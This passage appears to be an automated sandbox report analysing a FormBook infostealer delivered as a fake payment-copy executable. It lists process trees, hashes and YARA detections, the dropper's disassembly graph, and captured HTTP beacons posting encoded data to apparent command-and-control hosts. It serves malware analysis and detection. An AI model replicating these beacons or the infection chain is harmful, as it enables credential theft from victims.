                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      48192.168.2.849756144.217.103.3806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:45:53.892265081 CET440OUTGET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPEHAIn6yNHix56w== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 13:45:54.072010994 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:52 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      49192.168.2.849757103.120.80.111806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:46:00.634841919 CET700OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 52 71 73 46 72 74 58 71 57 49 63 55 37 4a 71 39 38 38 72 2b 50 51 53 46 46 48 6b 7a 2b 64 48 41 49 55 39 69 6e 74 59 62 58 42 2f 59 51 49 69 78 42 49 53 6e 4d 74 4e 5a 37 2f 38 59 71 47 52 75 74 35 6e 51 47 4e 2b 51 2f 78 46 43 34 53 45 4f 44 44 66 41 57 6a 71 6f 67 39 6d 6d 77 69 66 54 54 55 63 6d 66 49 55 6d 69 38 64 51 77 36 48 7a 32 5a 6b 43 79 31 54 62 74 56 31 4c 4d 61 50 51 33 64 72 6e 5a 52 42 5a 72 54 5a 65 48 30 45 30 72 33 56 4f 32 49 33 37 50 64 6a 51 43 47 37 4b 76 4c 4d 56 76 71 78 63 4d 61 7a 51 65 59 73 71 74 51 3d 3d
                                                                                                                      Data Ascii: nRRpS=RqsFrtXqWIcU7Jq988r+PQSFFHkz+dHAIU9intYbXB/YQIixBISnMtNZ7/8YqGRut5nQGN+Q/xFC4SEODDfAWjqog9mmwifTTUcmfIUmi8dQw6Hz2ZkCy1TbtV1LMaPQ3drnZRBZrTZeH0E0r3VO2I37PdjQCG7KvLMVvqxcMazQeYsqtQ==


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      50192.168.2.849758103.120.80.111806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:46:03.510993958 CET720OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 52 71 73 46 72 74 58 71 57 49 63 55 34 6f 61 39 77 37 48 2b 4b 77 53 47 41 48 6b 7a 6c 4e 48 45 49 55 35 69 6e 73 73 4c 55 79 62 59 52 71 36 78 41 4e 6d 6e 50 74 4e 5a 77 66 38 5a 6b 6d 52 70 74 35 71 7a 47 4d 43 51 2f 78 42 43 34 54 30 4f 45 30 72 50 55 7a 71 71 37 74 6d 6b 30 69 66 54 54 55 63 6d 66 49 70 44 69 39 31 51 77 4b 33 7a 33 34 6b 44 2b 56 54 55 6c 31 31 4c 64 4b 50 55 33 64 71 77 5a 51 4e 7a 72 56 56 65 48 78 34 30 72 6d 56 4a 34 49 33 48 53 4e 6a 50 48 6b 61 75 74 70 56 78 72 64 35 44 45 2b 57 6e 62 4e 41 35 71 72 59 39 41 45 65 6e 76 64 34 31 62 4a 2f 62 63 30 2f 6e 43 6c 51 3d
                                                                                                                      Data Ascii: nRRpS=RqsFrtXqWIcU4oa9w7H+KwSGAHkzlNHEIU5inssLUybYRq6xANmnPtNZwf8ZkmRpt5qzGMCQ/xBC4T0OE0rPUzqq7tmk0ifTTUcmfIpDi91QwK3z34kD+VTUl11LdKPU3dqwZQNzrVVeHx40rmVJ4I3HSNjPHkautpVxrd5DE+WnbNA5qrY9AEenvd41bJ/bc0/nClQ=


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:13:41:55
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:390'725 bytes
                                                                                                                      MD5 hash:1827B46843B0CF4502A0C0395914842D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:13:41:55
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\btpqr.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\btpqr.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:168'960 bytes
                                                                                                                      MD5 hash:51D987CA1642C555FB00D10AA35F8348
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 24%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:13:41:55
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:4
                                                                                                                      Start time:13:41:56
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\btpqr.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\btpqr.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:168'960 bytes
                                                                                                                      MD5 hash:51D987CA1642C555FB00D10AA35F8348
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:13:42:03
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe"
                                                                                                                      Imagebase:0x780000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:13:42:05
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      Imagebase:0xe00000
                                                                                                                      File size:41'984 bytes
                                                                                                                      MD5 hash:93925D4F55465CFC73C4CDF7F8B1F375
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:13:42:16
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe"
                                                                                                                      Imagebase:0x780000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:10
                                                                                                                      Start time:13:42:30
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                      Imagebase:0x7ff6d20e0000
                                                                                                                      File size:676'768 bytes
                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:17.1%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:21.8%
                                                                                                                        Total number of Nodes:1278
                                                                                                                        Total number of Limit Nodes:23
                                                                                                                        execution_graph 2738 403540 2739 403558 2738->2739 2740 40354a CloseHandle 2738->2740 2745 403585 2739->2745 2740->2739 2746 403593 2745->2746 2747 40355d 2746->2747 2748 403598 FreeLibrary GlobalFree 2746->2748 2749 4054ec 2747->2749 2748->2747 2748->2748 2791 40579b 2749->2791 2752 405520 2755 405655 2752->2755 2805 405bc7 lstrcpynA 2752->2805 2753 405509 DeleteFileA 2754 403569 2753->2754 2755->2754 2810 405ec2 FindFirstFileA 2755->2810 2757 40554a 2758 40555b 2757->2758 2759 40554e lstrcatA 2757->2759 2819 405701 lstrlenA 2758->2819 2761 405561 2759->2761 2764 40556f lstrcatA 2761->2764 2765 40557a lstrlenA FindFirstFileA 2761->2765 2764->2765 2765->2755 2786 40559e 2765->2786 2771 405695 2771->2754 2776 40569b 2771->2776 2772 4056ac 2773 404eb3 25 API calls 2772->2773 2773->2754 2774 405634 FindNextFileA 2777 40564c FindClose 2774->2777 2774->2786 2778 404eb3 25 API calls 2776->2778 2777->2755 2780 4056a3 2778->2780 2779 4055fb 2781 40587f 2 API calls 2779->2781 2782 405915 40 API calls 2780->2782 2784 405601 DeleteFileA 2781->2784 2783 4056aa 2782->2783 2783->2754 2790 40560c 2784->2790 2785 4054ec 61 API calls 2785->2786 2786->2774 2786->2779 2786->2785 2806 4056e5 2786->2806 2823 405bc7 lstrcpynA 2786->2823 2787 404eb3 25 API calls 2787->2774 2790->2774 2790->2787 2824 404eb3 2790->2824 2835 405915 2790->2835 2861 405bc7 lstrcpynA 2791->2861 2793 4057ac 2862 40574e CharNextA CharNextA 2793->2862 2796 405500 2796->2752 2796->2753 2798 4057ed lstrlenA 2799 4057f8 2798->2799 2803 4057c2 2798->2803 2801 4056ba 3 API calls 2799->2801 2800 405ec2 2 API calls 2800->2803 2802 4057fd GetFileAttributesA 2801->2802 2802->2796 2803->2796 2803->2798 2803->2800 2804 405701 2 API calls 2803->2804 2804->2798 2805->2757 2807 4056eb 2806->2807 2808 4056fe 2807->2808 2809 4056f1 CharNextA 2807->2809 2808->2786 2809->2807 2811 405ed8 FindClose 2810->2811 2812 40567a 2810->2812 2811->2812 2812->2754 2813 4056ba lstrlenA CharPrevA 2812->2813 2814 4056d4 lstrcatA 2813->2814 2815 405684 2813->2815 2814->2815 2816 40587f GetFileAttributesA 2815->2816 2817 40568a RemoveDirectoryA 2816->2817 2818 40588e SetFileAttributesA 2816->2818 2817->2771 2817->2772 2818->2817 2820 40570e 2819->2820 2821 405713 CharPrevA 2820->2821 2822 40571f 2820->2822 2821->2820 2821->2822 2822->2761 2823->2786 2825 404ece 2824->2825 2833 404f71 2824->2833 2826 404eeb lstrlenA 2825->2826 2877 405be9 2825->2877 2828 404f14 2826->2828 2829 404ef9 lstrlenA 2826->2829 2831 404f27 2828->2831 2832 404f1a SetWindowTextA 2828->2832 2830 404f0b lstrcatA 2829->2830 2829->2833 2830->2828 2831->2833 2834 404f2d SendMessageA SendMessageA SendMessageA 2831->2834 2832->2831 2833->2790 2834->2833 2904 405f57 GetModuleHandleA 2835->2904 2838 40597d GetShortPathNameA 2840 405992 2838->2840 2841 405a72 2838->2841 2840->2841 2843 40599a wsprintfA 2840->2843 2841->2790 2842 405961 CloseHandle GetShortPathNameA 2842->2841 2844 405975 2842->2844 2845 405be9 18 API calls 2843->2845 2844->2838 2844->2841 2846 4059c2 2845->2846 2911 40589e GetFileAttributesA CreateFileA 2846->2911 2848 4059cf 2848->2841 2849 4059de GetFileSize GlobalAlloc 2848->2849 2850 405a6b CloseHandle 2849->2850 2851 4059fc ReadFile 2849->2851 2850->2841 2851->2850 2852 405a10 2851->2852 2852->2850 2912 405813 lstrlenA 2852->2912 2855 405a25 2917 405bc7 lstrcpynA 2855->2917 2856 405a7f 2857 405813 4 API calls 2856->2857 2859 405a33 2857->2859 2860 405a46 SetFilePointer WriteFile GlobalFree 2859->2860 2860->2850 2861->2793 2863 405774 2862->2863 2864 405768 2862->2864 2866 4056e5 CharNextA 2863->2866 2867 405791 2863->2867 2864->2863 2865 40576f CharNextA 2864->2865 2865->2867 2866->2863 2867->2796 2868 405e29 2867->2868 2875 405e35 2868->2875 2869 405e9d 2870 405ea1 CharPrevA 2869->2870 2872 405ebc 2869->2872 2870->2869 2871 405e92 CharNextA 2871->2869 2871->2875 2872->2803 2873 4056e5 CharNextA 2873->2875 2874 405e80 CharNextA 2874->2875 2875->2869 2875->2871 2875->2873 2875->2874 2876 405e8d CharNextA 2875->2876 2876->2871 2882 405bf6 2877->2882 2878 405e10 2879 405e25 2878->2879 2903 405bc7 lstrcpynA 2878->2903 2879->2826 2881 405c8e GetVersion 2887 405c9b 2881->2887 2882->2878 2882->2881 2883 405de7 lstrlenA 2882->2883 2884 405be9 10 API calls 2882->2884 2891 405e29 5 API calls 2882->2891 2901 405b25 wsprintfA 2882->2901 2902 405bc7 lstrcpynA 2882->2902 2883->2882 2884->2883 2887->2882 2889 405d06 GetSystemDirectoryA 2887->2889 2890 405d19 GetWindowsDirectoryA 2887->2890 2892 405be9 10 API calls 2887->2892 2893 405d90 lstrcatA 2887->2893 2894 405d4d SHGetSpecialFolderLocation 2887->2894 2896 405aae RegOpenKeyExA 2887->2896 2889->2887 2890->2887 2891->2882 2892->2887 2893->2882 2894->2887 2895 405d65 SHGetPathFromIDListA CoTaskMemFree 2894->2895 2895->2887 2897 405ae1 RegQueryValueExA 2896->2897 2898 405b1f 2896->2898 2899 405b02 RegCloseKey 2897->2899 2898->2887 2899->2898 2901->2882 2902->2882 2903->2879 2905 405f73 2904->2905 2906 405f7d GetProcAddress 2904->2906 2918 405ee9 GetSystemDirectoryA 2905->2918 2908 405920 2906->2908 2908->2838 2908->2841 2910 40589e GetFileAttributesA CreateFileA 2908->2910 2909 405f79 2909->2906 2909->2908 2910->2842 2911->2848 2913 405849 lstrlenA 2912->2913 2914 405827 lstrcmpiA 2913->2914 2916 405853 2913->2916 2915 405840 CharNextA 2914->2915 2914->2916 2915->2913 2916->2855 2916->2856 2917->2859 2919 405f0b wsprintfA LoadLibraryExA 2918->2919 2919->2909 3402 4042c1 3403 4042ed 3402->3403 3404 4042fe 3402->3404 3463 40546c GetDlgItemTextA 3403->3463 3406 40430a GetDlgItem 3404->3406 3412 404369 3404->3412 3409 40431e 3406->3409 3407 40444d 3411 4045f7 3407->3411 3465 40546c GetDlgItemTextA 3407->3465 3408 4042f8 3410 405e29 5 API calls 3408->3410 3414 404332 SetWindowTextA 3409->3414 3415 40574e 4 API calls 3409->3415 3410->3404 3419 403eea 8 API calls 3411->3419 3412->3407 3412->3411 3416 405be9 18 API calls 3412->3416 3418 403e83 19 API calls 3414->3418 3420 404328 3415->3420 3421 4043dd SHBrowseForFolderA 3416->3421 3417 40447d 3422 40579b 18 API calls 3417->3422 3423 40434e 3418->3423 3424 40460b 3419->3424 3420->3414 3428 4056ba 3 API calls 3420->3428 3421->3407 3425 4043f5 CoTaskMemFree 3421->3425 3426 404483 3422->3426 3427 403e83 19 API calls 3423->3427 3429 4056ba 3 API calls 3425->3429 3466 405bc7 lstrcpynA 3426->3466 3430 40435c 3427->3430 3428->3414 3431 404402 3429->3431 3464 403eb8 SendMessageA 3430->3464 3434 404439 SetDlgItemTextA 3431->3434 3439 405be9 18 API calls 3431->3439 3434->3407 3435 404362 3437 405f57 5 API calls 3435->3437 3436 40449a 3438 405f57 5 API calls 3436->3438 3437->3412 3445 4044a1 3438->3445 3440 404421 lstrcmpiA 3439->3440 3440->3434 3443 404432 lstrcatA 3440->3443 3441 4044dd 3467 405bc7 lstrcpynA 3441->3467 3443->3434 3444 4044e4 3446 40574e 4 API calls 3444->3446 3445->3441 3449 405701 2 API calls 3445->3449 3451 404535 3445->3451 3447 4044ea GetDiskFreeSpaceA 3446->3447 3450 40450e MulDiv 3447->3450 3447->3451 3449->3445 3450->3451 3452 4045a6 3451->3452 3468 40473d 3451->3468 3453 4045c9 3452->3453 3455 40140b 2 API calls 3452->3455 3479 403ea5 EnableWindow 3453->3479 3455->3453 3458 4045a8 SetDlgItemTextA 3458->3452 3459 404598 3471 404678 3459->3471 3460 4045e5 3460->3411 3480 404256 3460->3480 3463->3408 3464->3435 3465->3417 3466->3436 3467->3444 3469 404678 21 API calls 3468->3469 3470 404593 3469->3470 3470->3458 3470->3459 3472 40468e 3471->3472 3473 405be9 18 API calls 3472->3473 3474 4046f2 3473->3474 3475 405be9 18 API calls 3474->3475 3476 4046fd 3475->3476 3477 405be9 18 API calls 3476->3477 3478 404713 lstrlenA wsprintfA SetDlgItemTextA 3477->3478 3478->3452 3479->3460 3481 404264 3480->3481 3482 404269 SendMessageA 3480->3482 3481->3482 3482->3411 3483 401cc2 3487 402a0c 3483->3487 3485 401cd2 SetWindowLongA 3486 4028be 3485->3486 3488 405be9 18 API calls 3487->3488 3489 402a20 3488->3489 3489->3485 3490 401a43 3491 402a0c 18 API calls 3490->3491 3492 401a49 3491->3492 3493 402a0c 18 API calls 3492->3493 3494 4019f3 3493->3494 3495 402648 3496 40264b 3495->3496 3500 402663 3495->3500 3497 402658 FindNextFileA 3496->3497 3498 4026a2 3497->3498 3497->3500 3501 405bc7 lstrcpynA 3498->3501 3501->3500 3505 401bca 3506 402a0c 18 API calls 3505->3506 3507 401bd1 3506->3507 3508 402a0c 18 API calls 3507->3508 3509 401bdb 3508->3509 3510 401beb 3509->3510 3511 402a29 18 API calls 3509->3511 3512 402a29 18 API calls 3510->3512 3516 401bfb 3510->3516 3511->3510 3512->3516 3513 401c06 3517 402a0c 18 API calls 3513->3517 3514 401c4a 3515 402a29 18 API calls 3514->3515 3518 401c4f 3515->3518 3516->3513 3516->3514 3519 401c0b 3517->3519 3521 402a29 18 API calls 3518->3521 3520 402a0c 18 API calls 3519->3520 3522 401c14 3520->3522 3523 401c58 FindWindowExA 3521->3523 3524 401c3a SendMessageA 3522->3524 3525 401c1c SendMessageTimeoutA 3522->3525 3526 401c76 3523->3526 